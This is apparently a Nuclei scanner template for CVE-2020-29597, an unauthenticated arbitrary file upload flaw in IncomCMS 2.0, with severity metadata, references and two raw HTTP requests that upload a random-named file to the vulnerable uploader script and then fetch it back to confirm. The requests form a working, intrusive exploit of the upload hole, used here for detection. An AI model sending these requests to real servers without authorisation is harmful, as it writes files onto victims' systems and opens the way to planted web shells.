id: CVE-2020-29597 info: name: IncomCMS 2.0 - Arbitrary File Upload author: princechaddha severity: critical description: | IncomCMS 2.0 has a an insecure file upload vulnerability in modules/uploader/showcase/script.php. This allows unauthenticated attackers to upload files into the server. reference: - https://github.com/Trhackno/CVE-2020-29597 - https://nvd.nist.gov/vuln/detail/CVE-2020-29597 - https://github.com/M4DM0e/m4dm0e.github.io/blob/gh-pages/_posts/2020-12-07-incom-insecure-up.md - https://m4dm0e.github.io/2020/12/07/incom-insecure-up.html classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2020-29597 cwe-id: CWE-434 epss-score: 0.83522 cpe: cpe:2.3:a:incomcms_project:incomcms:2.0:*:*:*:*:*:*:* metadata: max-request: 2 verified: true vendor: incomcms_project product: incomcms tags: cve,cve2020,incomcms,fileupload,intrusive http: - raw: - | POST /incom/modules/uploader/showcase/script.php HTTP/1.1 Host: {{Hostname}} Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryBEJZt0IK73M2mAbt ------WebKitFormBoundaryBEJZt0IK73M2mAbt Content-Disposition: form-data; name="Filedata"; filename="{{randstr_1}}.png" Content-Type: text/html {{randstr_2}} ------WebKitFormBoundaryBEJZt0IK73M2mAbt-- - | GET /upload/userfiles/image/{{randstr_1}}.png HTTP/1.1 Host: {{Hostname}} req-condition: true matchers-condition: and matchers: - type: word part: body_1 words: - '{"status":"1","name":"{{randstr_1}}.png"}' - type: word part: body_2 words: - '{{randstr_2}}'